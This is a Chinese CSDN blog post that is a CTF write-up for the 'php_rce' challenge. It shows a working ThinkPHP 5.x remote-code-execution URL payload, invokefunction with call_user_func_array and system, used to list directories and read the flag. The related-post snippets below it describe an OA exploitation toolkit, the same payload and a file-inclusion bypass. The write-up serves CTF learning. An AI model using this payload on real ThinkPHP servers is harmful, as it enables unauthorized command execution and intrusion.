ctf攻防世界 WEB题:php_rce

最新推荐文章于 2024-04-25 15:54:14 发布
最新推荐文章于 2024-04-25 15:54:14 发布
阅读量840 收藏 4
点赞数
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30889301/article/details/130581008
版权

php_rce

入门ctf做的第一道关于thinkphp的web题,记录一下加深印象

在这里插入图片描述
这里是关于ThinkPHP框架的详细介绍。

ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。

ThinkPHP框架的主要特点包括:

  • MVC架构:采用经典的MVC(Model-View-Controller)架构,将应用程序的业务逻辑、数据模型和用户界面分离,使得应用程序更易于维护和扩展。
  • ORM支持:提供了强大的ORM(Object-Relational Mapping)支持,可以将数据库表映射为对象,使得开发人员可以更方便地操作数据库。
  • 缓存支持:提供了多种缓存支持,包括文件缓存、Memcached缓存、Redis缓存等,可以提高应用程序的性能和响应速度。
  • 安全性:提供了多种安全机制,包括输入验证、输出过滤、SQL注入防护、XSS防护等,可以保障应用程序的安全性。
  • 扩展性:提供了丰富的扩展机制,包括插件机制、行为机制、模板引擎扩展等,可以方便地扩展和定制应用程序。

对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1

下面开始解题:
进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架在这里插入图片描述
在Aazhen_RexHa文件根目录下运行命令打开该工具

java -javaagent:rexha.jar -jar rexha.jar

在这里插入图片描述
打开工具后将靶场地址粘进去
全扫一遍后发现有两个漏洞
一个是远程代码执行
还有一个数据库信息泄露
在这里插入图片描述
远程代码任意执行一般能拿到不少东西,先使用这个
此工具已经给一个可用的url案例,我们只需要更改就可以了

http://61.147.171.105:49836/index.php?s=%2FIndex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=id 
//这个url已经过urlencode,为了方便理解,下面一行使用urldecode结果展示
http://61.147.171.105:49836/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

参数解析

这个URL参数是对目标web服务器进行的远程代码执行

  • ThinkPHP的请求处理器(think)
  • 应用程序控制器(app)
  • 函数调用器(invokefunction)
  • 通过invokefunction指定了要调用的函数名为"calluserfuncarray"。该函数的作用是调用一个用户自定义的函数,并将一个数组作为参数传递给该函数。
  • 在这个URL请求中,该函数的第一个参数是"system",表示要执行的系统命令,
  • 第二个参数是一个数组,其中包含要传递给该命令的参数。在这个例子中,该数组只包含一个参数"id"

下面我们把的第二个数组元素内容作为要执行的命令修改以下就ok了

http://61.147.171.105:49836/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

在这里插入图片描述
查询上一级目录ls /
发现flag,获取它

在这里插入图片描述

cat flag
在这里插入图片描述

小白江山
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含漏洞,配合前台文件上传可以直接getshell,无需获取有效Cookie 2.如果本地文件包含漏洞利用失败,则可以利用任意用户登录漏洞与SQL注入漏洞 这两个突破的利用方式集成在了“获取Cookie”按钮上共计6个POC,其中任意一个POC利用成功的都会自动停止,并自动填充有效的Cookie到工具上获取有效的Cookie后,可以选择后台文件发布一键利用如目标存在弱密码,可手动填充有效Cookie后配合文件上传一键利用 3.特定版本v11.6存在任意文件删除漏洞的利用 当目标为v11.6版本时,
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_docker CTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。 因此,打算收集整理一些自己做的Web环境,方便复现。 Enjoy it.
关于 CTFphp 考点与绕过那些事的总结
Welcome To Myon'Blog !
03-04 1551
_POST //获取post数据,是一个字典$_GET //获取get数据,是一个字典$_COOKIE //获取cookie数据$_SESSION //获取session数据$_FILES //获取上传的文件$_REQUEST //获取$_GET, $_POST, $_COOKIE中的数据$_SERVER //用户和服务器的基本信息数据库$_ENV //环境数据$GLOBALS //所有全局变量。
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)
Onlyone_1314的博客
09-03 971
先访问目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
攻防世界-Web进阶篇-007php_rce
gyy990526的博客
03-14 2242
解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问 构造payload,查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/
攻防世界php_rceWeb_php_include
qq_42728977的博客
01-19 2947
Web_php_unserialize php_rce web_php_include 1、漏洞点:php strstr() 绕过,伪协议包含漏洞 这个提有很多利用方法。 方法一: 访问页面看到如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php...
php_rce(攻防世界
m0_70819573的博客
02-20 250
2.关于thinkphp的框架漏洞,可以参考。1.打开主页,提示了thinkphp版本较低。poc和exp有一大堆。
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2299
web篇(php_rce)详解
CTF | 网络安全攻防世界 php_rce详析
等风来
05-22 4856
[CTF/网络安全] 攻防世界 php_rce详析
攻防世界——php_rce
weixin_73942557的博客
10-16 171
在网上查找这个东西,发现有远程命令执行漏洞。利用已经构造好的payload直接上。看到了flag查看路径获取它。攻防世界——php_rce。使用whereis命令查找。
攻防世界】三 --- php_rce
qq_43168364的博客
12-23 421
目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞,可以找到一些 由于我们不知其具体的版本,随便找一个执行一下,这里选择第一个 会显出了root 说明thinkphp的版本可能就是:5.0.22,在选择下面的命令执行paylaod执行 可以执行命令 执行find命令查找flag相关文件 可以在根目录下找到flag文件 使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF和靶机攻防。技术栈python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue部署基于ubuntu 18 ...
CTF-AWD-WEB:AWD 模式下的WEB仓库
05-17
CTF-AWD-WEB AWD 模式下的WEB仓库 上传一些参加过的CTF线下赛AWD模式的WEB
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
TCP相关问总结
qq_62835094的博客
04-23 1180
假设TCP是两次握手,则可能会发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此时触发超时重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此会发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不会发送数据,因此会造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
Android配置环境
u012627628的博客
04-24 341
执行命令:sudo mv /home/用户名/Downloads/android-sdk-linux /usr/java。sudo mv /home/用户名/Downloads/jdk1.8.0_271 /usr/java。执行命令:/usr/java/android-sdk-linux/tools/android。执行命令:tar -zxvf android-sdk-linux.tgz。执行 source /etc/profile。验证是否安装成功(我验证是成功的)执行:java -version。
PHP】sign加签方法示例
最新发布
q8688的博客
04-25 382
【代码】【PHP】sign加签方法示例。
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 603
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值